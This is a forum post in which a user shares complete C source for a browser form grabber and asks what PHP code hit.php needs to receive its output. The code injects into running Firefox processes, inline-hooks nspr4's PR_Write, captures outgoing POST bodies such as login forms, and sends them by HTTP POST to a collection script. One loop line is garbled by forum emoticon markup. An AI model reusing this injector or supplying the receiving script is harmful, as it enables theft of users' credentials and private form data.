formgrabber sourcecode c# output to hit.php what do i need in php script
to capture the postdata sent from formgrabber
I basically need to know what sort of code I need in hit.php to get the data
from my running C source code.
#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wininet.h>
/*
 * Function-pointer types for the Win32 / WinINet routines the injected code
 * calls. main() fills instances of these in with GetProcAddress results and
 * ships them to the target inside Inject_Data, so VirtualProtect, Sleep and
 * the four wininet functions are not static imports of this binary. (The
 * injection calls made directly in main -- CreateToolhelp32Snapshot,
 * OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread -- are
 * linked normally and do remain visible in the import table.)
 */
// GetModuleHandleA
typedef HMODULE (WINAPI *GMH) (LPCTSTR);
// GetProcAddress
typedef FARPROC (WINAPI *GPA) (HMODULE,LPCSTR);
// VirtualProtect (declared here as returning int; the real API returns BOOL)
typedef int (WINAPI *VP) (LPVOID,SIZE_T,DWORD,PDWORD);
// InternetOpenA
typedef HINTERNET (WINAPI *IO) (LPCTSTR,DWORD,LPCTSTR,LPCTSTR,DWORD);
// InternetConnectA
typedef HINTERNET (WINAPI
*IC)(HINTERNET,LPCTSTR,INTERNET_PORT,LPCTSTR,LPCTSTR,DWORD,DWORD,DWORD_PTR);
// HttpOpenRequestA
typedef HINTERNET (WINAPI *HOR)
(HINTERNET,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR*,DWORD,DWORD_PTR);
// HttpSendRequestA
typedef BOOL (WINAPI *HSR)(HINTERNET,LPCTSTR,DWORD,LPVOID,DWORD);
// Sleep
typedef VOID (WINAPI *Slep)(DWORD);
/*
 * Everything the remote code needs, packed into one self-contained block.
 * main() fills it in, copies it into the target with WriteProcessMemory and
 * passes the remote address as the thread parameter; Hook() then reads and
 * updates it in place. Presumably this is why the strings below are inline
 * char arrays rather than char pointers: pointers into the injector's
 * address space would be meaningless in the target.
 */
typedef struct {
GMH GetMH; //GetModuleHandleA, resolved in main
GPA GetPA; //GetProcAddress, resolved in main
VP SetVP; //VirtualProtect, resolved in main
Slep Slepx; //Sleep, resolved in main
char ModuleName[36]; //"nspr4.dll" -- the module whose export is hooked
char Proc[36]; //"PR_Write" -- the hooked export
BYTE *PR_Write; //resolved address of nspr4!PR_Write; advanced as the prologue is overwritten (Hook)
BYTE *nptr; //scratch: jump displacement / patch address during hook installation
DWORD *bptr; //scratch: DWORD view of the byte being patched
DWORD OldProtect; //out-parameter for VirtualProtect
char blank[3]; //"" -- empty user name / password for InternetConnect
char localhost[16]; //"localhost" -- HTTP destination host (port 8080 hard-coded in Hook)
char post[10]; //"POST" -- HTTP verb
char visit[16]; //"/hit.php" -- HTTP path
char header[64]; //"Content-Type:application/x-www-form-urlencoded"
HINTERNET OpenHandle; //InternetOpen session (set at the end of Hook's installer path)
HINTERNET ConnectHandle; //NOTE: actually receives the HttpOpenRequest handle (names are swapped in Hook)
HINTERNET Handle; //NOTE: actually receives the InternetConnect handle
int nLen; //length of the intercepted PR_Write buffer
char *pVar; //pointer to the intercepted PR_Write buffer
IO IOx; //InternetOpenA
IC ICx; //InternetConnectA
HOR HORx; //HttpOpenRequestA
HSR HSRx; //HttpSendRequestA
} Inject_Data;
void Hook(Inject_Data *pData);
/*
 * Injector entry point. Walks the process list and, for each "firefox.exe",
 * copies the Inject_Data block and the raw machine code of Hook() into that
 * process and starts Hook on a remote thread.
 *
 * Observable sequence -- the classic remote-thread injection pattern and the
 * usual telemetry points for a defender: CreateToolhelp32Snapshot ->
 * OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(PAGE_READWRITE) +
 * WriteProcessMemory (the data block) -> VirtualAllocEx(2000 bytes,
 * PAGE_EXECUTE_READWRITE) + WriteProcessMemory (the code) ->
 * CreateRemoteThread whose start address lies inside that private RWX
 * region. Hook's trailing loop is intended never to exit, so the
 * WaitForSingleObject(INFINITE) below blocks this process for as long as
 * the remote thread lives.
 *
 * Returns 0.
 */
int main() {
Inject_Data Data;
LPVOID Mem,Prm; // Mem: remote copy of Hook's code; Prm: remote copy of Data
HANDLE rThread;
HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // reused below for the process handle
PROCESSENTRY32 ProcessInfo;
ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
LoadLibrary("wininet.dll"); // so the GetModuleHandle("wininet.dll") lookups below find the module
// Resolve every API the remote code will need and carry the addresses in
// Data rather than through the import table.
Data.GetMH =(GMH)
GetProcAddress(GetModuleHandle("kernel32.dll"),"GetModuleHandleA");
Data.GetPA =
(GPA)GetProcAddress(GetModuleHandle("kernel32.dll"),"GetProcAddress");
Data.IOx =
(IO)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetOpenA");
Data.ICx =
(IC)GetProcAddress(GetModuleHandle("wininet.dll"),"InternetConnectA");
Data.HORx =
(HOR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpOpenRequestA");
Data.HSRx =
(HSR)GetProcAddress(GetModuleHandle("wininet.dll"),"HttpSendRequestA");
Data.SetVP =
(VP)GetProcAddress(GetModuleHandle("kernel32.dll"),"VirtualProtect");
Data.Slepx = (Slep)GetProcAddress(GetModuleHandle("kernel32.dll"),"Sleep");
// Fixed strings copied into the target: the hooked module/export and the
// HTTP destination (plaintext POST to localhost:8080 /hit.php, see Hook).
wsprintf(Data.ModuleName,"nspr4.dll");
wsprintf(Data.Proc,"PR_Write");
wsprintf(Data.localhost,"localhost");
wsprintf(Data.post,"POST");
wsprintf(Data.visit,"/hit.php");
wsprintf(Data.header,"Content-Type:application/x-www-form-urlencoded");
wsprintf(Data.blank,"");
// Iterate the snapshot taken above (no Process32First call precedes this).
while(Process32Next(handle, &ProcessInfo))
{
if(!strcmp(ProcessInfo.szExeFile, "firefox.exe"))
{
handle = OpenProcess(PROCESS_ALL_ACCESS,0,ProcessInfo.th32ProcessID); // overwrites the snapshot handle
Prm =
VirtualAllocEx(handle,NULL,sizeof(Data),MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
WriteProcessMemory(handle,Prm,&Data,sizeof(Data),NULL);
Mem =
VirtualAllocEx(handle,NULL,2000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
// Hook's machine code is copied as a flat 2000-byte blob. This presumes the
// compiler emitted Hook contiguously with no absolute relocations; the
// call/pop "delta" sequences inside Hook are what make the blob
// position-independent.
WriteProcessMemory(handle,Mem,Hook,2000,NULL);
rThread =
CreateRemoteThread(handle,NULL,0,(LPTHREAD_START_ROUTINE)Mem,Prm,0,NULL);
WaitForSingleObject(rThread, INFINITE);
CloseHandle(handle);
}
}
return 0;
}
/*
 * Code that runs inside the target process. CreateRemoteThread starts it with
 * pData = the remote copy of Inject_Data. Because it is copied byte-for-byte
 * to an address chosen by VirtualAllocEx, it must be position-independent:
 * every reference to a local label goes through a call/pop "delta" sequence.
 *
 * Two entry paths:
 *   - start:  reached via the goto below (the remote-thread entry). Installs
 *             an inline hook on nspr4!PR_Write, opens a WinINet session, then
 *             loops on Sleep.
 *   - Hooked: reached only through the patched PR_Write prologue, i.e. on
 *             every PR_Write call made by the browser.
 *
 * Defender-visible artifacts: the first byte of nspr4!PR_Write becomes 0xE9
 * (JMP rel32) followed by 0xCC; a VirtualProtect(PAGE_EXECUTE_READWRITE) on
 * nspr4's code; and, whenever a written buffer starts with the dword
 * 0x54534F50 ("POST"), an unencrypted HTTP POST from the browser process to
 * localhost:8080 /hit.php carrying that buffer as the request body.
 *
 * MSVC 32-bit inline assembly throughout; not portable.
 */
void Hook(Inject_Data *pData) {
BYTE *temp;
goto start; // skip the hook body: it is only ever entered via the patched PR_Write
Hooked:
// Hook body. On entry the stack holds PR_Write's arguments: [esp+8] is the
// buffer, [esp+0xC] the length. Anything that is not a POST falls through
// to prexJMP untouched.
__asm{
mov ecx,[esp+0xC]
mov eax,[esp+0x8]
cmp dword ptr[eax],0x54534F50 // POST?
jne prexJMP //its not POST
push ecx
call getDelta4 //Get the delta
getDelta4:
pop ecx
sub ecx,offset getDelta4
lea eax,Data
add eax,ecx
pop ecx
mov eax,[eax] // the Inject_Data pointer stored in the Data slot (written by the getDelta2 sequence below)
mov pData,eax
mov eax,[esp+0x8]
mov temp,eax
}
pData->pVar = temp; // intercepted buffer
__asm{ nop }
__asm{ mov ecx,[esp+0xC] }
__asm{ mov temp,ecx }
__asm{ nop }
pData->nLen = temp; // its length (a pointer-typed temp stored into an int)
__asm{ nop }
// Temporarily overwrite the first two bytes of the intercepted buffer before
// sending it; they are restored below so the browser's own request goes
// out unchanged.
*pData->pVar = 0x72;
pData->pVar++;
*pData->pVar = 0x3D;
pData->pVar--;
// Exfiltration: plaintext HTTP POST of the captured buffer (pVar, nLen) to
// localhost:8080 /hit.php through the WinINet pointers resolved in main.
// Field naming is swapped here: Handle receives the InternetConnect handle
// and ConnectHandle the HttpOpenRequest handle. No return value is checked.
pData->Handle =
pData->ICx(pData->OpenHandle,pData->localhost,8080,pData->blank,pData->blank,INTERNET_SERVICE_HTTP,0,0);
pData->ConnectHandle =
pData->HORx(pData->Handle,pData->post,pData->visit,NULL,NULL,NULL,INTERNET_FLAG_KEEP_CONNECTION,0);
pData->HSRx(pData->ConnectHandle,pData->header,-1L,pData->pVar,pData->nLen); // -1L: header string is NUL-terminated
*pData->pVar = 0x50;
pData->pVar++;
*pData->pVar = 0x4F;
pData->pVar--;
prexJMP:
// Trampoline: the 6 prologue bytes that the JMP overwrote in PR_Write are
// replicated here ...
__asm{
MOV EAX,DWORD PTR [ESP+4]
MOV ECX,DWORD PTR [EAX] }
xJMP:
// ... and this jmp's 4-byte displacement is patched at install time (the
// getDelta1 sequence below) so control continues at PR_Write+6. ExitProcess
// appears to be only a placeholder target for the assembler.
__asm{ jmp ExitProcess }
Data:
// 4-byte slot, patched at install time with the Inject_Data pointer so the
// hook body (which receives no argument) can find its state.
__asm{ nop
nop
nop
nop
}
start:
// --- Installer path (remote-thread entry) ---
// Resolve nspr4!PR_Write and make its first 6 bytes writable.
pData->PR_Write = (BYTE*)
pData->GetPA(pData->GetMH(pData->ModuleName),pData->Proc);
pData->SetVP(pData->PR_Write,6,PAGE_EXECUTE_READWRITE,&pData->OldProtect);
//ptr = (BYTE*) Hooked;
// Compute the run-time address of Hooked (position-independent) into temp.
__asm{ push ecx }
__asm{ call getDelta } //Get the delta
__asm{ getDelta: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta }
__asm{ push eax }
__asm{ lea eax,Hooked }
__asm{ add eax,ecx }
__asm{ mov temp,eax }
__asm{ pop eax }
__asm{ pop ecx }
// Write "E9 <rel32> CC" over PR_Write's prologue, rel32 = Hooked - (PR_Write+5).
pData->nptr = temp;
pData->nptr = pData->nptr - pData->PR_Write;
pData->nptr = pData->nptr - 5;
*pData->PR_Write = 0xE9;
pData->PR_Write++;
pData->bptr = (DWORD*) pData->PR_Write;
*pData->bptr = (DWORD) pData->nptr;
pData->PR_Write = pData->PR_Write + 4;
*pData->PR_Write = 0xCC;
pData->PR_Write++; // PR_Write now points 6 bytes in, at the first instruction left intact
// Compute the run-time address of xJMP into temp.
__asm{ push ecx }
__asm{ call getDelta1 } //Get the delta
__asm{ getDelta1: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta1 }
__asm{ push eax }
__asm{ lea eax,xJMP }
__asm{ add eax,ecx }
__asm{ mov temp,eax }
__asm{ pop eax }
__asm{ pop ecx }
// Patch xJMP's displacement so the trampoline jumps to PR_Write+6;
// nptr++ skips the E9 opcode, and the 10-byte VirtualProtect makes this
// block's own code writable (the region is already RWX from VirtualAllocEx).
pData->nptr = temp;
pData->PR_Write = pData->PR_Write - pData->nptr;
pData->PR_Write = pData->PR_Write - 5;
pData->nptr++;
pData->OldProtect = 0;
pData->SetVP(pData->nptr,10,PAGE_EXECUTE_READWRITE,&pData->OldProtect);
pData->bptr = (DWORD*) pData->nptr;
*pData->bptr = (DWORD) pData->PR_Write;
// Store this block's address into the Data slot for the hook body.
temp = (BYTE *) pData;
__asm{ push ecx }
__asm{ call getDelta2 } //Get the delta
__asm{ getDelta2: }
__asm{ pop ecx }
__asm{ sub ecx,offset getDelta2 }
__asm{ push eax }
__asm{ push ebx }
__asm{ lea eax,Data }
__asm{ add eax,ecx }
__asm{ mov ebx,temp }
__asm{ mov dword ptr[eax],ebx }
__asm{ pop ebx }
__asm{ pop eax }
__asm{ pop ecx }
/*start the connection */
// WinINet session reused by every later exfiltration request.
pData->OpenHandle =
pData->IOx(pData->localhost,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
// Keep the remote thread alive. This line was mangled by the forum's
// emoticon rendering and does not compile as shown.
for(;<imgsrc='http://www.rohitab.com/discuss/public/style_emoticons/<#EMO_DIR#>/wink.gif'
class='bbc_emoticon' alt=';)' /> { pData->Slepx(1000); }
}
Here is the C source above.
All I need to know is what I need in my PHP script;
my PHP file is blank, as illustrated below.
hit.php
<?php
?>